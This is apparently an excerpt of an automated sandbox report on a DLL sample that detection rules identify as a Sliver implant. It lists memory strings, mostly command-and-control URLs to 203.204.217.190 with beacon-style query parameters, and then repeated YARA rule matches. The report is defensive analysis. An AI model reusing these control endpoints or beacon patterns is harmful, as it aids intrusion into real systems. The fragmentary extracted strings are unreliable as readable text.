            Source: loaddll32.exe, 00000001.00000002.4220764521.000000000A19C000.00000004.00001000.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.3285464830.000000000A19A000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://203.204.217.190:8092/register.html?_=y529553t55&ar=67086i726Mozilla/5.0
            Source: loaddll32.exe, 00000001.00000002.4212338833.000000000A006000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://203.204.217.190:8092/register.html?_=y529553t55&ar=67086i726http://203.204.217.190:8092/oaut
            Source: loaddll32.exe, 00000001.00000002.4220764521.000000000A19C000.00000004.00001000.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.3285464830.000000000A19A000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://203.204.217.190:8092/register.php
            Source: loaddll32.exe, 00000001.00000002.4220764521.000000000A19C000.00000004.00001000.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.3285464830.000000000A19A000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://203.204.217.190:8092/register.php.
            Source: rundll32.exe, 00000005.00000002.4211265707.00000000007EA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://203.204.217.190:80925
            Source: rundll32.exe, 00000008.00000002.4210435396.000000000064A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://203.204.217.190:8092;0
            Source: rundll32.exe, 00000008.00000002.4210435396.000000000064A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://203.204.217.190:8092B0
            Source: rundll32.exe, 00000006.00000003.3618422591.000000000CC1A000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2663738732.000000000CC1A000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://203.204.217.190:8092Content-Transfer-EncodingIf-Modified-SinceFri
            Source: rundll32.exe, 00000008.00000002.4214213422.000000000CC1A000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://203.204.217.190:8092Content-Transfer-Encodinghttps://203.204.217.190:8092WinHttpGetDefaultPr
            Source: rundll32.exe, 00000008.00000002.4224327410.000000000CDF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://203.204.217.190:8092IRED
            Source: regsvr32.exe, 00000004.00000002.4211857579.000000000CC06000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3835679098.000000000CD04000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4216612761.000000000CC80000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2663104353.000000000CCF6000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.4220443970.000000000CCF6000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://203.204.217.190:8092Mozilla/5.0
            Source: loaddll32.exe, 00000001.00000002.4209755047.0000000001145000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://203.204.217.190:8092NG
            Source: regsvr32.exe, 00000004.00000002.4213969543.000000000CC8E000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.3998388511.000000000CC8E000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://203.204.217.190:8092WinHttpGetDefaultProxyConfigurat
            Source: rundll32.exe, 00000005.00000002.4221007051.000000000CD66000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://203.204.217.190:8092_=82918870&eu=584673u09http://203.204.217.190:8092/
            Source: loaddll32.exe, 00000001.00000003.3285588693.000000000A188000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://203.204.217.190:8092_=y529553t55&ar=67086i726
            Source: rundll32.exe, 00000006.00000002.4214808976.000000000CCA0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://203.204.217.190:8092ab1c2d3e4f5g6h7j8k9m0npqrtuvwxyzf=4d9398139&qc=dl58467309https://203.204
            Source: rundll32.exe, 00000006.00000002.4214808976.000000000CCA0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://203.204.217.190:8092cannot
            Source: rundll32.exe, 00000005.00000003.3834672492.000000000CDC0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://203.204.217.190:8092d=d74442283&la=63379h847mtls://203.204.217.190:8082S
            Source: regsvr32.exe, 00000004.00000002.4213969543.000000000CC8E000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.3998388511.000000000CC8E000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://203.204.217.190:8092e=97374091&sa=63y379847
            Source: rundll32.exe, 00000005.00000002.4211265707.00000000007EA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://203.204.217.190:8092h
            Source: rundll32.exe, 00000007.00000002.4214531173.000000000C8B2000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://203.204.217.190:8092hm=6708kc6726&o=3450k3059
            Source: rundll32.exe, 00000006.00000003.2588879689.000000000CDC8000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4221106121.000000000CDC8000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://203.204.217.190:8092ht=633798h47&q=3n750q0253SetupDiSetSelectedDeviceSetupUninstallOEMInfWCo
            Source: loaddll32.exe, 00000001.00000002.4214235667.000000000A05A000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.4221656723.000000000CE04000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.4224327410.000000000CDF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://203.204.217.190:8092http://203.204.217.190:8092
            Source: loaddll32.exe, 00000001.00000002.4225609264.000000000A494000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4221007051.000000000CD66000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3834672492.000000000CDC0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4219372703.000000000CD62000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2589492198.000000000CD62000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3671523760.000000000C9CE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://203.204.217.190:8092http://203.204.217.190:8092http://203.204.217.190:8092WinHttpGetDefaultP
            Source: regsvr32.exe, 00000004.00000002.4222371334.000000000CE6A000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://203.204.217.190:8092http://203.204.217.190:8092mtls://203.204.217.190:8082https://203.204.21
            Source: loaddll32.exe, 00000001.00000002.4215361930.000000000A082000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://203.204.217.190:8092https://203.204.217.190:8092/api/namespaces/login.html?r=3772_4761&so=58
            Source: rundll32.exe, 00000006.00000002.4212929021.000000000CC06000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3618422591.000000000CC06000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://203.204.217.190:8092https://203.204.217.190:8092/db/oauth2/register.html?f=4d9398139&qc=dl58
            Source: loaddll32.exe, 00000001.00000002.4225609264.000000000A494000.00000004.00001000.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.3285588693.000000000A188000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4221007051.000000000CD66000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.4214531173.000000000C8B2000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://203.204.217.190:8092https://203.204.217.190:8092WinHttpGetDefaultProxyConfigurat
            Source: rundll32.exe, 00000006.00000003.2588879689.000000000CDC8000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://203.204.217.190:8092https://203.204.217.190:8092WinHttpGetDefaultProxyConfigurata
            Source: rundll32.exe, 00000005.00000003.3834672492.000000000CDC0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://203.204.217.190:8092https://203.204.217.190:8092WinHttpGetDefaultProxyConfiguratc
            Source: regsvr32.exe, 00000004.00000003.3998918249.000000000CC1A000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://203.204.217.190:8092https://203.204.217.190:8092WinHttpGetDefaultProxyConfiguratn
            Source: loaddll32.exe, 00000001.00000003.3286610660.000000000A088000.00000004.00001000.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000002.4215361930.000000000A088000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3834672492.000000000CDC0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2588879689.000000000CDC8000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4221106121.000000000CDC8000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2662917416.000000000CD22000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.4221030380.000000000CD22000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://203.204.217.190:8092mtls://203.204.217.190:8082
            Source: rundll32.exe, 00000007.00000002.4212133165.000000000C81A000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://203.204.217.190:8092mtls://203.204.217.190:8082stream.Writer
            Source: rundll32.exe, 00000007.00000003.3671523760.000000000C9CE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://203.204.217.190:8092mtls://203.204.217.190:8082t
            Source: rundll32.exe, 00000008.00000002.4214213422.000000000CC1A000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://203.204.217.190:8092n=56_849732&pi=58467309
            Source: regsvr32.exe, 00000004.00000003.3998918249.000000000CC1A000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://203.204.217.190:8092o=6504532m6&vm=p58467309
            Source: loaddll32.exe, 00000001.00000002.4209755047.0000000001145000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://203.204.217.190:8092pG
            Source: rundll32.exe, 00000008.00000002.4210435396.000000000064A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://203.204.217.190:8092q3
            Source: loaddll32.exe, 00000001.00000002.4225609264.000000000A494000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://203.204.217.190:8092r=3772_4761&so=584673b09/
            Source: rundll32.exe, 00000007.00000002.4212133165.000000000C81A000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://203.204.217.190:8092resource
            Source: rundll32.exe, 00000005.00000003.3836232325.000000000CC16000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://203.204.217.190:8092same
            Source: rundll32.exe, 00000006.00000002.4221106121.000000000CDC8000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://203.204.217.190:8092urathttps://203.204.217.190:8092
            Source: rundll32.exe, 00000007.00000002.4212133165.000000000C85A000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://58467309hpsignin.phpphp/signin.php
            Source: rundll32.exe, 00000008.00000002.4214213422.000000000CC14000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://HTTP/1.1t
            Source: rundll32.exe, 00000008.00000002.4214213422.000000000CC14000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://HTTP/1.1tUser-AgeUser-AgentUser-Agentn=unixgramn=56_849732&pi=ConnectionConnectionConnection
            Source: rundll32.exe, 00000005.00000002.4219138978.000000000CD30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://_=82918870&eu=HTTP/1.1tUser-Age_=User-AgentUser-Agent_=82918870&eu=ConnectionConnectionConne
            Source: loaddll32.exe, 00000001.00000003.3284494679.000000000A2B4000.00000004.00001000.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000002.4223687019.000000000A2B4000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://_=y529553t55&ar=HTTP/1.1t
            Source: loaddll32.exe, 00000001.00000003.3284494679.000000000A2B4000.00000004.00001000.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000002.4223687019.000000000A2B4000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://_=y529553t55&ar=HTTP/1.1tUser-Age_=User-AgentUser-Agent_=y529553t55&ar=ConnectionConnectionC
            Source: rundll32.exe, 00000008.00000003.2663104353.000000000CD0E000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.4220443970.000000000CD0E000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://cr=67086lp726&o=HTTP/1.1t
            Source: rundll32.exe, 00000008.00000003.2663104353.000000000CD0E000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.4220443970.000000000CD0E000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://cr=67086lp726&o=HTTP/1.1tUser-Agecr=User-AgentUser-Agentcr=67086lp726&o=ConnectionConnection
            Source: rundll32.exe, 00000007.00000002.4212133165.000000000C85A000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://cz=n58467o309&m=HTTP/1.1t
            Source: rundll32.exe, 00000007.00000002.4212133165.000000000C85A000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://cz=n58467o309&m=HTTP/1.1tUser-Agecz=User-AgentUser-Agentcz=n58467o309&m=Connection8Connectio
            Source: rundll32.exe, 00000005.00000002.4222744476.000000000CDE0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://d=d74442283&la=HTTP/1.1tUser-Aged=User-AgentUser-Agentd=d74442283&la=ConnectionConnectionCon
            Source: regsvr32.exe, 00000004.00000002.4213969543.000000000CC96000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://e=97374091&sa=HTTP/1.1tUser-Agee=User-AgentUser-Agente=97374091&sa=Connection8ConnectionConn
            Source: rundll32.exe, 00000006.00000002.4217009815.000000000CD0A000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://f=4d9398139&qc=HTTP/1.1tno
            Source: rundll32.exe, 00000007.00000002.4223588113.000000000CA74000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://hm=6708kc6726&o=HTTP/1.1t
            Source: rundll32.exe, 00000007.00000002.4223588113.000000000CA74000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://hm=6708kc6726&o=HTTP/1.1tUser-Agehm=User-AgentUser-Agenthm=6708kc6726&o=ConnectionConnection
            Source: rundll32.exe, 00000006.00000003.2588772776.000000000CDE8000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://ht=633798h47&q=HTTP/1.1tUser-Ageht=User-AgentUser-Agentht=633798h47&q=ConnectionConnectionCo
            Source: regsvr32.exe, 00000004.00000003.3998918249.000000000CC14000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.4211857579.000000000CC14000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://o=6504532m6&vm=HTTP/1.1tUser-Ageo=User-AgentUser-Agento=6504532m6&vm=Connection
            Source: loaddll32.exe, 00000001.00000002.4225609264.000000000A484000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://r=3772_4761&so=HTTP/1.1tUser-Ager=User-AgentUser-Agentr=3772_4761&so=Connection8ConnectionCo

            System Summary

            Source: 5cPRapVOx6.dll, type: SAMPLE | Matched rule: Multi_Trojan_Bishopsliver_42298c4a Author: unknown
            Source: 5cPRapVOx6.dll, type: SAMPLE | Matched rule: Detects Sliver implant cross-platform adversary emulation/red team Author: ditekSHen
            Source: 6.2.rundll32.exe.6be00000.0.unpack, type: UNPACKEDPE | Matched rule: Multi_Trojan_Bishopsliver_42298c4a Author: unknown
            Source: 6.2.rundll32.exe.6be00000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Sliver implant cross-platform adversary emulation/red team Author: ditekSHen
            Source: 7.2.rundll32.exe.6be00000.0.unpack, type: UNPACKEDPE | Matched rule: Multi_Trojan_Bishopsliver_42298c4a Author: unknown
            Source: 7.2.rundll32.exe.6be00000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Sliver implant cross-platform adversary emulation/red team Author: ditekSHen
            Source: 5.2.rundll32.exe.6be00000.0.unpack, type: UNPACKEDPE | Matched rule: Multi_Trojan_Bishopsliver_42298c4a Author: unknown
            Source: 5.2.rundll32.exe.6be00000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Sliver implant cross-platform adversary emulation/red team Author: ditekSHen
            Source: 1.2.loaddll32.exe.6be00000.0.unpack, type: UNPACKEDPE | Matched rule: Multi_Trojan_Bishopsliver_42298c4a Author: unknown
            Source: 1.2.loaddll32.exe.6be00000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Sliver implant cross-platform adversary emulation/red team Author: ditekSHen
            Source: 4.2.regsvr32.exe.6be00000.0.unpack, type: UNPACKEDPE | Matched rule: Multi_Trojan_Bishopsliver_42298c4a Author: unknown
            Source: 4.2.regsvr32.exe.6be00000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Sliver implant cross-platform adversary emulation/red team Author: ditekSHen
            Source: 8.2.rundll32.exe.6be00000.0.unpack, type: UNPACKEDPE | Matched rule: Multi_Trojan_Bishopsliver_42298c4a Author: unknown
            Source: 8.2.rundll32.exe.6be00000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Sliver implant cross-platform adversary emulation/red team Author: ditekSHen
            Source: 00000001.00000002.4230715500.000000006CA27000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Multi_Trojan_Bishopsliver_42298c4a Author: unknown
            Source: 00000006.00000002.4229493462.000000006CA27000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Multi_Trojan_Bishopsliver_42298c4a Author: unknown
            Source: 00000004.00000002.4229586587.000000006CA27000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Multi_Trojan_Bishopsliver_42298c4a Author: unknown
            Source: 00000007.00000002.4229872481.000000006CA27000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Multi_Trojan_Bishopsliver_42298c4a Author: unknown
            Source: 00000005.00000002.4230484560.000000006CA27000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Multi_Trojan_Bishopsliver_42298c4a Author: unknown
            Source: 00000008.00000002.4231392141.000000006CA27000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Multi_Trojan_Bishopsliver_42298c4a Author: unknown
            Source: Process Memory Space: loaddll32.exe PID: 7336, type: MEMORYSTR | Matched rule: Multi_Trojan_Bishopsliver_42298c4a Author: unknown
            Source: Process Memory Space: regsvr32.exe PID: 7472, type: MEMORYSTR | Matched rule: Multi_Trojan_Bishopsliver_42298c4a Author: unknown
            Source: Process Memory Space: rundll32.exe PID: 7480, type: MEMORYSTR | Matched rule: Multi_Trojan_Bishopsliver_42298c4a Author: unknown
            Source: Process Memory Space: rundll32.exe PID: 7488, type: MEMORYSTR | Matched rule: Multi_Trojan_Bishopsliver_42298c4a Author: unknown
            Source: Process Memory Space: rundll32.exe PID: 7624, type: MEMORYSTR | Matched rule: Multi_Trojan_Bishopsliver_42298c4a Author: unknown
            Source: Process Memory Space: rundll32.exe PID: 7664, type: MEMORYSTR | Matched rule: Multi_Trojan_Bishopsliver_42298c4a Author: unknown
            Source: 5cPRapVOx6.dll | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED, DLL
            Source: 5cPRapVOx6.dll, type: SAMPLE | Matched rule: Multi_Trojan_Bishopsliver_42298c4a reference_sample = 3b45aae401ac64c055982b5f3782a3c4c892bdb9f9a5531657d50c27497c8007, os = multi, severity = x86, creation_date = 2021-10-20, scan_context = file, memory, license = Elastic License v2, threat_name = Multi.Trojan.Bishopsliver, fingerprint = 0734b090ea10abedef4d9ed48d45c834dd5cf8e424886a5be98e484f69c5e12a, id = 42298c4a-fcea-4c5a-b213-32db00e4eb5a, last_modified = 2022-01-14
            Source: 5cPRapVOx6.dll, type: SAMPLE | Matched rule: INDICATOR_TOOL_Sliver author = ditekSHen, description = Detects Sliver implant cross-platform adversary emulation/red team
            Source: 6.2.rundll32.exe.6be00000.0.unpack, type: UNPACKEDPE | Matched rule: Multi_Trojan_Bishopsliver_42298c4a reference_sample = 3b45aae401ac64c055982b5f3782a3c4c892bdb9f9a5531657d50c27497c8007, os = multi, severity = x86, creation_date = 2021-10-20, scan_context = file, memory, license = Elastic License v2, threat_name = Multi.Trojan.Bishopsliver, fingerprint = 0734b090ea10abedef4d9ed48d45c834dd5cf8e424886a5be98e484f69c5e12a, id = 42298c4a-fcea-4c5a-b213-32db00e4eb5a, last_modified = 2022-01-14
            Source: 6.2.rundll32.exe.6be00000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_TOOL_Sliver author = ditekSHen, description = Detects Sliver implant cross-platform adversary emulation/red team
            Source: 7.2.rundll32.exe.6be00000.0.unpack, type: UNPACKEDPE | Matched rule: Multi_Trojan_Bishopsliver_42298c4a reference_sample = 3b45aae401ac64c055982b5f3782a3c4c892bdb9f9a5531657d50c27497c8007, os = multi, severity = x86, creation_date = 2021-10-20, scan_context = file, memory, license = Elastic License v2, threat_name = Multi.Trojan.Bishopsliver, fingerprint = 0734b090ea10abedef4d9ed48d45c834dd5cf8e424886a5be98e484f69c5e12a, id = 42298c4a-fcea-4c5a-b213-32db00e4eb5a, last_modified = 2022-01-14
            Source: 7.2.rundll32.exe.6be00000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_TOOL_Sliver author = ditekSHen, description = Detects Sliver implant cross-platform adversary emulation/red team
            Source: 5.2.rundll32.exe.6be00000.0.unpack, type: UNPACKEDPE | Matched rule: Multi_Trojan_Bishopsliver_42298c4a reference_sample = 3b45aae401ac64c055982b5f3782a3c4c892bdb9f9a5531657d50c27497c8007, os = multi, severity = x86, creation_date = 2021-10-20, scan_context = file, memory, license = Elastic License v2, threat_name = Multi.Trojan.Bishopsliver, fingerprint = 0734b090ea10abedef4d9ed48d45c834dd5cf8e424886a5be98e484f69c5e12a, id = 42298c4a-fcea-4c5a-b213-32db00e4eb5a, last_modified = 2022-01-14
            Source: 5.2.rundll32.exe.6be00000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_TOOL_Sliver author = ditekSHen, description = Detects Sliver implant cross-platform adversary emulation/red team
            Source: 1.2.loaddll32.exe.6be00000.0.unpack, type: UNPACKEDPE | Matched rule: Multi_Trojan_Bishopsliver_42298c4a reference_sample = 3b45aae401ac64c055982b5f3782a3c4c892bdb9f9a5531657d50c27497c8007, os = multi, severity = x86, creation_date = 2021-10-20, scan_context = file, memory, license = Elastic License v2, threat_name = Multi.Trojan.Bishopsliver, fingerprint = 0734b090ea10abedef4d9ed48d45c834dd5cf8e424886a5be98e484f69c5e12a, id = 42298c4a-fcea-4c5a-b213-32db00e4eb5a, last_modified = 2022-01-14
            Source: 1.2.loaddll32.exe.6be00000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_TOOL_Sliver author = ditekSHen, description = Detects Sliver implant cross-platform adversary emulation/red team
            Source: 4.2.regsvr32.exe.6be00000.0.unpack, type: UNPACKEDPE | Matched rule: Multi_Trojan_Bishopsliver_42298c4a reference_sample = 3b45aae401ac64c055982b5f3782a3c4c892bdb9f9a5531657d50c27497c8007, os = multi, severity = x86, creation_date = 2021-10-20, scan_context = file, memory, license = Elastic License v2, threat_name = Multi.Trojan.Bishopsliver, fingerprint = 0734b090ea10abedef4d9ed48d45c834dd5cf8e424886a5be98e484f69c5e12a, id = 42298c4a-fcea-4c5a-b213-32db00e4eb5a, last_modified = 2022-01-14
            Source: 4.2.regsvr32.exe.6be00000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_TOOL_Sliver author = ditekSHen, description = Detects Sliver implant cross-platform adversary emulation/red team
            Source: 8.2.rundll32.exe.6be00000.0.unpack, type: UNPACKEDPE | Matched rule: Multi_Trojan_Bishopsliver_42298c4a reference_sample = 3b45aae401ac64c055982b5f3782a3c4c892bdb9f9a5531657d50c27497c8007, os = multi, severity = x86, creation_date = 2021-10-20, scan_context = file, memory, license = Elastic License v2, threat_name = Multi.Trojan.Bishopsliver, fingerprint = 0734b090ea10abedef4d9ed48d45c834dd5cf8e424886a5be98e484f69c5e12a, id = 42298c4a-fcea-4c5a-b213-32db00e4eb5a, last_modified = 2022-01-14
            Source: 8.2.rundll32.exe.6be00000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_TOOL_Sliver author = ditekSHen, description = Detects Sliver implant cross-platform adversary emulation/red team
            Source: 00000001.00000002.4230715500.000000006CA27000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Multi_Trojan_Bishopsliver_42298c4a reference_sample = 3b45aae401ac64c055982b5f3782a3c4c892bdb9f9a5531657d50c27497c8007, os = multi, severity = x86, creation_date = 2021-10-20, scan_context = file, memory, license = Elastic License v2, threat_name = Multi.Trojan.Bishopsliver, fingerprint = 0734b090ea10abedef4d9ed48d45c834dd5cf8e424886a5be98e484f69c5e12a, id = 42298c4a-fcea-4c5a-b213-32db00e4eb5a, last_modified = 2022-01-14
            Source: 00000006.00000002.4229493462.000000006CA27000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Multi_Trojan_Bishopsliver_42298c4a reference_sample = 3b45aae401ac64c055982b5f3782a3c4c892bdb9f9a5531657d50c27497c8007, os = multi, severity = x86, creation_date = 2021-10-20, scan_context = file, memory, license = Elastic License v2, threat_name = Multi.Trojan.Bishopsliver, fingerprint = 0734b090ea10abedef4d9ed48d45c834dd5cf8e424886a5be98e484f69c5e12a, id = 42298c4a-fcea-4c5a-b213-32db00e4eb5a, last_modified = 2022-01-14
            Source: 00000004.00000002.4229586587.000000006CA27000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Multi_Trojan_Bishopsliver_42298c4a reference_sample = 3b45aae401ac64c055982b5f3782a3c4c892bdb9f9a5531657d50c27497c8007, os = multi, severity = x86, creation_date = 2021-10-20, scan_context = file, memory, license = Elastic License v2, threat_name = Multi.Trojan.Bishopsliver, fingerprint = 0734b090ea10abedef4d9ed48d45c834dd5cf8e424886a5be98e484f69c5e12a, id = 42298c4a-fcea-4c5a-b213-32db00e4eb5a, last_modified = 2022-01-14
            Source: 00000007.00000002.4229872481.000000006CA27000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Multi_Trojan_Bishopsliver_42298c4a reference_sample = 3b45aae401ac64c055982b5f3782a3c4c892bdb9f9a5531657d50c27497c8007, os = multi, severity = x86, creation_date = 2021-10-20, scan_context = file, memory, license = Elastic License v2, threat_name = Multi.Trojan.Bishopsliver, fingerprint = 0734b090ea10abedef4d9ed48d45c834dd5cf8e424886a5be98e484f69c5e12a, id = 42298c4a-fcea-4c5a-b213-32db00e4eb5a, last_modified = 2022-01-14
            Source: 00000005.00000002.4230484560.000000006CA27000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Multi_Trojan_Bishopsliver_42298c4a reference_sample = 3b45aae401ac64c055982b5f3782a3c4c892bdb9f9a5531657d50c27497c8007, os = multi, severity = x86, creation_date = 2021-10-20, scan_context = file, memory, license = Elastic License v2, threat_name = Multi.Trojan.Bishopsliver, fingerprint = 0734b090ea10abedef4d9ed48d45c834dd5cf8e424886a5be98e484f69c5e12a, id = 42298c4a-fcea-4c5a-b213-32db00e4eb5a, last_modified = 2022-01-14
            Source: 00000008.00000002.4231392141.000000006CA27000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Multi_Trojan_Bishopsliver_42298c4a reference_sample = 3b45aae401ac64c055982b5f3782a3c4c892bdb9f9a5531657d50c27497c8007, os = multi, severity = x86, creation_date = 2021-10-20, scan_context = file, memory, license = Elastic License v2, threat_name = Multi.Trojan.Bishopsliver, fingerprint = 0734b090ea10abedef4d9ed48d45c834dd5cf8e424886a5be98e484f69c5e12a, id = 42298c4a-fcea-4c5a-b213-32db00e4eb5a, last_modified = 2022-01-14
            Source: Process Memory Space: loaddll32.exe PID: 7336, type: MEMORYSTR | Matched rule: Multi_Trojan_Bishopsliver_42298c4a reference_sample = 3b45aae401ac64c055982b5f3782a3c4c892bdb9f9a5531657d50c27497c8007, os = multi, severity = x86, creation_date = 2021-10-20, scan_context = file, memory, license = Elastic License v2, threat_name = Multi.Trojan.Bishopsliver, fingerprint = 0734b090ea10abedef4d9ed48d45c834dd5cf8e424886a5be98e484f69c5e12a, id = 42298c4a-fcea-4c5a-b213-32db00e4eb5a, last_modified = 2022-01-14
            Source: Process Memory Space: regsvr32.exe PID: 7472, type: MEMORYSTR | Matched rule: Multi_Trojan_Bishopsliver_42298c4a reference_sample = 3b45aae401ac64c055982b5f3782a3c4c892bdb9f9a5531657d50c27497c8007, os = multi, severity = x86, creation_date = 2021-10-20, scan_context = file, memory, license = Elastic License v2, threat_name = Multi.Trojan.Bishopsliver, fingerprint = 0734b090ea10abedef4d9ed48d45c834dd5cf8e424886a5be98e484f69c5e12a, id = 42298c4a-fcea-4c5a-b213-32db00e4eb5a, last_modified = 2022-01-14
            Source: Process Memory Space: rundll32.exe PID: 7480, type: MEMORYSTR | Matched rule: Multi_Trojan_Bishopsliver_42298c4a reference_sample = 3b45aae401ac64c055982b5f3782a3c4c892bdb9f9a5531657d50c27497c8007, os = multi, severity = x86, creation_date = 2021-10-20, scan_context = file, memory, license = Elastic License v2, threat_name = Multi.Trojan.Bishopsliver, fingerprint = 0734b090ea10abedef4d9ed48d45c834dd5cf8e424886a5be98e484f69c5e12a, id = 42298c4a-fcea-4c5a-b213-32db00e4eb5a, last_modified = 2022-01-14
